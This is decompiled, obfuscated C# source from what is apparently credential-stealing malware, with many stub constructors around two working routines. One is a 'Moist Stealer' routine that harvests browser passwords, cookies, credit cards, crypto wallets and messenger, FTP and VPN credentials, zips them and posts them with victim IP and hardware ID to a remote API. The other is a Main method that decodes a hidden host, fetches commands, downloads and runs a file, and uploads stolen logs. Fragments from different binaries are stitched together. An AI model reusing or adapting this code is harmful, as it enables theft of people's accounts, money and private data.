// Token: 0x060001B6 RID: 438 RVA: 0x0000DBE0 File Offset: 0x0000BDE0
public AnnotationWorker()
{
Class21.smethod_0();
base..ctor();
base.SetStyle(ControlStyles.SupportsTransparentBackColor, true);
base.SetStyle(ControlStyles.UserPaint, true);
this.pen_0 = new Pen(Color.FromArgb(180, 180, 180));
this.solidBrush_0 = new SolidBrush(Color.White);
this.BackColor = Color.Transparent;
this.ForeColor = Color.DimGray;
this.long_1 = 0L;
this.long_2 = 100L;
this.Font = new Font("Tahoma", 11f);
base.Size = new Size(70, 28);
this.MinimumSize = new Size(62, 28);
this.DoubleBuffered = true;
}
// Token: 0x060000BA RID: 186 RVA: 0x0000959C File Offset: 0x0000779C
public Client(string def)
{
Class21.smethod_0();
base..ctor();
this.decorator = def;
ManagementObjectCollection source = new ManagementObjectSearcher("select * from win32_networkadapter where Name='" + this.decorator + "'").Get();
this.m_Prototype = source.Cast <ManagementObject>().FirstOrDefault <ManagementObject>();
try
{
Match match = Regex.Match(this.m_Prototype.Path.RelativePath, "\\\"(\\d+)\\\"$");
this.database = int.Parse(match.Groups[1].Value);
}
catch
{
return;
}
this.rules = NetworkInterface.GetAllNetworkInterfaces().Where(new Func <NetworkInterface, bool>(this.ComputeWorker)).Select(new Func <NetworkInterface, string>(Client.StateToken._SchemaToken.PatchDescriptor)).FirstOrDefault <string>();
}
// Token: 0x170000B6 RID: 182
object IList.this[int index]
{
get
{
if (this.icollection_0 != null)
{
throw new InvalidOperationException("Wrapped ICollection<T> does not support indexer.");
}
return(this.ilist_0[index]);
}
set
{
if (this.icollection_0 != null)
{
throw new InvalidOperationException("Wrapped ICollection<T> does not support indexer.");
}
Class21 <nhRd76JVPX5GP69E2c> .smethod_0(value);
this.ilist_0[index] = (nhRd76JVPX5GP69E2c)((object)value);
}
}
// Token: 0x060004C8 RID: 1224 RVA: 0x000048D8 File Offset: 0x00002AD8
// Note: this type is marked as 'beforefieldinit'.
static TokenToken()
{
Class21.smethod_0();
TokenToken.nameValueCollection_0 = new NameValueCollection();
}
// Token: 0x060004C5 RID: 1221 RVA: 0x000048B3 File Offset: 0x00002AB3
public TokenToken()
{
Class21.smethod_0();
base..ctor();
this.webClient_0 = new WebClient();
}
// Token: 0x06000518 RID: 1304 RVA: 0x00002354 File Offset: 0x00000554
internal Resources()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x060000F8 RID: 248 RVA: 0x00002A87 File Offset: 0x00000C87
public Reader()
{
Class21.smethod_0();
this..ctor(new Iterator());
}
public static void GetStealer()
{
try
{
Directory.CreateDirectory(Help.Moist_Dir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
File.SetAttributes(Help.dir, FileAttributes.Hidden | FileAttributes.System | FileAttributes.Directory);
GetFiles.Inizialize(Help.Moist_Dir);
Thread.Sleep(new Random(Environment.TickCount).Next(10000, 20000));
try
{
Class4.smethod_0(Help.Cookies);
}
catch
{
}
try
{
Class4.PlqfdbrYf(Help.Passwords);
}
catch
{
}
try
{
Class4.smethod_2(Help.Autofills);
}
catch
{
}
try
{
Class4.smethod_3(Help.Downloads);
}
catch
{
}
try
{
Class4.smethod_4(Help.History);
}
catch
{
}
try
{
Class4.smethod_1(Help.Cards);
}
catch
{
}
try
{
Class12.smethod_2();
}
catch
{
}
try
{
Class12.smethod_3();
}
catch
{
}
try
{
Class25.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class15.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class24.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class23.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class20.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
TGrabber.Start(Help.Moist_Dir);
}
catch
{
}
try
{
Class14.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class21.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class13.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class22.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class16.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class17.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
Class37.smethod_0(Help.Moist_Dir);
}
catch
{
}
try
{
DomainDetect.Start(Help.Browsers);
}
catch
{
}
string text = string.Concat(new string[]
{
Help.dir,
"\\",
Help.HWID,
Help.smethod_0(),
".zip"
});
using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
{
zipFile.CompressionLevel = 9;
zipFile.Comment = string.Concat(new string[]
{
"Moist Stealer. Build 1.1\n<---------------------------------------->\nPC:",
Environment.MachineName,
"/",
Environment.UserName,
"\nIP: ",
Help.IP,
Help.Country(),
"\nHWID: ",
Help.HWID
});
zipFile.AddDirectory(Help.Moist_Dir ?? "");
zipFile.Save(text ?? "");
}
string text2 = text ?? "";
byte[] file = File.ReadAllBytes(text2);
string url = string.Concat(new string[]
{
Help.ApiUrl,
"?id=",
Class1.string_0,
"&caption=",
"⚡️ Moist Stealer Gate detected new log! ⚡️\n",
"\ud83d\udd25 User: "******"/",
Environment.UserName,
" \ud83d\udd25\n",
"\ud83c\udf0d IP: " + Help.IP,
" ",
Help.Country(),
"\n\n",
string.Concat(new string[]
{
"\n\ud83c\udf10 Browsers Data\nPasswords: ",
(Class4.int_0 + Class10.int_0 + Class12.EeFrnHmbxo).ToString(),
"\nCookies: ",
(Class4.int_3 + Class12.int_0).ToString(),
"\nHistory: ",
Class4.int_4.ToString(),
"\nAutofill: ",
Class4.int_1.ToString(),
"\nCC: ",
Class4.int_5.ToString(),
"\n"
}),
string.Concat(new string[]
{
"\n\ud83d\udcb6 Wallets: ",
(Class37.int_0 > 0) ? "Yes" : "No",
(Class31.int_0 > 0) ? " Electrum" : "",
(Class26.int_0 > 0) ? " Armory" : "",
(Class27.int_0 > 0) ? " Atomic" : "",
(Class28.int_0 > 0) ? " BitcoinCore" : "",
(Class29.int_0 > 0) ? " Bytecoin" : "",
(Class30.int_0 > 0) ? " DashCore" : "",
(Class32.int_0 > 0) ? " Ethereum" : "",
(Class33.int_0 > 0) ? " Exodus" : "",
(Class35.int_0 > 0) ? " LitecoinCore" : "",
(Class36.int_0 > 0) ? " Monero" : "",
(Class38.int_0 > 0) ? " Zcash" : "",
(Class34.int_0 > 0) ? " Jaxx" : "",
"\n\n\ud83e\uddf2 Grabbed files: ",
GetFiles.count.ToString(),
"\n\ud83d\udcac Discord: ",
(Class14.int_0 > 0) ? "Yes" : "No",
"\n\ud83d\udee9 Telegram: ",
(TGrabber.count > 0) ? "Yes" : "No",
"\n\ud83d\udca1 Jabber: ",
(Class20.int_0 + Class18.int_0 > 0) ? "Yes" : "No",
(Class18.int_0 > 0) ? (" Pidgin (" + Class18.uGwrzbZsuw.ToString() + ")") : "",
(Class20.int_0 > 0) ? " Psi" : "",
"\n\n\ud83d\udce1 FTP\nFileZilla: ",
(Class16.int_0 > 0) ? ("Yes (" + Class16.int_0.ToString() + ")") : "No",
"\nTotalCmd: ",
(Class17.int_0 > 0) ? "Yes" : "No",
"\n\n⚖️ VPN\nNordVPN: ",
(Class23.int_0 > 0) ? "Yes" : "No",
"\nOpenVPN: ",
(Class24.int_0 > 0) ? "Yes" : "No",
"\nProtonVPN: ",
(Class25.int_0 > 0) ? "Yes" : "No",
"\n\nHWID: ",
Help.HWID,
"\n⚙️ ",
Class22.smethod_4(),
"\n\ud83d\udd0e Domain detect",
File.ReadAllText(Help.Browsers + "\\DomainDetect.txt")
})
});
SenderAPI.POST(file, text2, "application/x-ms-dos-executable", url);
Directory.Delete(Help.dir + "\\", true);
File.AppendAllText(Help.LocalData + "\\" + Help.HWID, Help.HWID);
}
catch
{
}
}
// Token: 0x060004B8 RID: 1208 RVA: 0x00004803 File Offset: 0x00002A03
// Note: this type is marked as 'beforefieldinit'.
static SystemMethod()
{
Class21.smethod_0();
SystemMethod.nameValueCollection_0 = new NameValueCollection();
}
// Token: 0x060000E1 RID: 225 RVA: 0x00002354 File Offset: 0x00000554
protected Strategy()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x060000B9 RID: 185 RVA: 0x000028C0 File Offset: 0x00000AC0
public Client(NetworkInterface var1)
{
Class21.smethod_0();
this..ctor(var1.Description);
}
// Token: 0x060000C8 RID: 200 RVA: 0x00002354 File Offset: 0x00000554
public StateToken()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x060000C7 RID: 199 RVA: 0x0000293B File Offset: 0x00000B3B
// Note: this type is marked as 'beforefieldinit'.
static StateToken()
{
Class21.smethod_0();
Client.StateToken._SchemaToken = new Client.StateToken();
}
// Token: 0x06000260 RID: 608 RVA: 0x000039F4 File Offset: 0x00001BF4
// Note: this type is marked as 'beforefieldinit'.
static SerializerVisitor()
{
Class21.smethod_0();
SerializerVisitor.string_0 = string.Empty;
}
// Token: 0x0600025F RID: 607 RVA: 0x00002354 File Offset: 0x00000554
public SerializerVisitor()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x0600010B RID: 267 RVA: 0x00002354 File Offset: 0x00000554
public Candidate()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x060000D8 RID: 216 RVA: 0x00002354 File Offset: 0x00000554
protected Interceptor()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x06000517 RID: 1303 RVA: 0x00004DC0 File Offset: 0x00002FC0
// Note: this type is marked as 'beforefieldinit'.
static Settings()
{
Class21.smethod_0();
Settings.defaultInstance = (Settings)SettingsBase.Synchronized(new Settings());
}
// Token: 0x0600007F RID: 127 RVA: 0x00002354 File Offset: 0x00000554
internal Class1()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x060000E2 RID: 226 RVA: 0x00002963 File Offset: 0x00000B63
public Iterator()
{
Class21.smethod_0();
base..ctor();
this.observer_0 = new Observer();
}
// Token: 0x06000514 RID: 1300 RVA: 0x00004DB3 File Offset: 0x00002FB3
public Settings()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x0600000A RID: 10 RVA: 0x00002354 File Offset: 0x00000554
public Tests()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x0600024A RID: 586 RVA: 0x00003982 File Offset: 0x00001B82
public WrapperVisitor()
{
Class21.smethod_0();
base..ctor();
this.ConcatMethod(new Reader());
}
// Token: 0x06000131 RID: 305 RVA: 0x0000A8D0 File Offset: 0x00008AD0
private static void Main(string[] args)
{
Class9.smethod_0();
Class9.smethod_1();
Class9.smethod_2();
string string_ = "ʰʷˉ˞˜ʷ˩˾ʰ˼ʷʰ˞ˉ˜ʷʰʷʷ˼ʰʷ˜ʰʷ˜ʰ˒ʷ˜ʰʰʰʨʷʰʷʰʷʰʨʷʰʷʰ˿˜˾˩˼ˣ˯˳˃˞˜ˏ˓˃˯˳˼ˣʩʩʩʷʷʷʷ";
byte[] byte_ = Class8.smethod_0("687474703a2f2f67616d656670736275737465722e7275");
byte[] bytes = Encoding.Default.GetBytes(Class11.smethod_2(string_));
string @string = Encoding.Default.GetString(Class11.smethod_0(bytes, byte_));
byte[] bytes2 = Encoding.Default.GetBytes(@string);
GClass9.smethod_0();
Class23.smethod_5(Class23.string_0);
GClass9.smethod_1();
string[] array = new StreamReader(WebRequest.Create(Encoding.Default.GetString(Class11.smethod_0(bytes, bytes2))).GetResponse().GetResponseStream()).ReadToEnd().Split(new char[]
{
','
});
bool flag = false;
bool flag2 = false;
bool flag3 = false;
bool flag4 = false;
bool flag5 = false;
bool flag6 = false;
bool flag7 = false;
bool flag8 = false;
bool flag9 = false;
bool flag10 = false;
bool flag11 = false;
if (array[12] == "1")
{
flag8 = true;
}
if (!flag8)
{
Class12.smethod_5();
}
if (array[0] == "1")
{
flag = true;
}
if (array[1] == "1")
{
flag4 = true;
}
if (array[2] == "1")
{
flag5 = true;
}
if (array[3] == "1")
{
flag11 = true;
}
if (array[4] == "1")
{
flag2 = true;
}
if (array[5] == "1")
{
flag6 = true;
}
if (array[6] == "1")
{
flag10 = true;
}
if (array[7] == "1")
{
flag3 = true;
}
if (array[10] == "1")
{
flag9 = true;
}
if (array[11].StartsWith("http"))
{
flag7 = true;
}
if (flag7)
{
string text = array[11];
string fileName = Path.GetFileName(text);
Class20.smethod_0(text, fileName);
}
if (flag)
{
Class13.smethod_3();
Class21.smethod_0();
}
if (flag5)
{
Class18.smethod_0();
}
if (flag7)
{
string text2 = array[11];
string fileName2 = Path.GetFileName(text2);
Class20.smethod_0(text2, fileName2);
}
if (flag2)
{
Class17.smethod_10();
}
if (flag6)
{
Class17.smethod_6();
}
if (flag4)
{
Class15.smethod_0();
Class13.smethod_2();
Class25.smethod_9();
}
if (flag11)
{
Class17.smethod_5(GClass9.string_2);
}
if (flag3)
{
foreach (string item in array[8].Split(new char[]
{
':'
}))
{
Class17.list_0.Add(item);
}
Class17.int_0 = Convert.ToInt32(array[9]);
Class17.int_0 *= 1024;
Class17.smethod_8();
}
if (flag10)
{
Class17.smethod_9();
}
Class17.smethod_11();
Class17.smethod_7();
Class23.smethod_0();
Class12.smethod_11();
Class12.smethod_9();
Class12.smethod_10();
Class23.smethod_1();
Class12.smethod_6();
string string_2 = GClass9.string_0 + "\\" + Class23.string_0 + ".zip";
try
{
Class27.smethod_0();
Class27.smethod_1(Encoding.Default.GetString(Class11.smethod_0(bytes, bytes2)), string_2, "logs", "zip", Class27.nameValueCollection_0);
}
catch
{
}
if (flag9)
{
Class12.smethod_7();
}
Class12.smethod_8();
Directory.Delete(GClass9.string_6);
}
// Token: 0x060000F7 RID: 247 RVA: 0x00002A7A File Offset: 0x00000C7A
public Observer()
{
Class21.smethod_0();
base..ctor();
}
// Token: 0x06000072 RID: 114 RVA: 0x0000272F File Offset: 0x0000092F
// Note: this type is marked as 'beforefieldinit'.
static Broadcaster()
{
Class21.smethod_0();
Broadcaster.random_0 = new Random();
}
// Token: 0x06000247 RID: 583 RVA: 0x00003954 File Offset: 0x00001B54
public AccountVisitor()
{
Class21.smethod_0();
base..ctor();
this.ForgotMethod(new Reader());
}
// Token: 0x06000073 RID: 115 RVA: 0x00002740 File Offset: 0x00000940
// Note: this type is marked as 'beforefieldinit'.
static ProcessToken()
{
Class21.smethod_0();
Broadcaster.ProcessToken.importerToken = new Broadcaster.ProcessToken();
}
// Token: 0x060000F9 RID: 249 RVA: 0x00002A99 File Offset: 0x00000C99
public Reader(Strategy item)
{
Class21.smethod_0();
base..ctor();
this.PopVisitor(item);
}
// Token: 0x06000074 RID: 116 RVA: 0x00002354 File Offset: 0x00000554
public ProcessToken()
{
Class21.smethod_0();
base..ctor();
}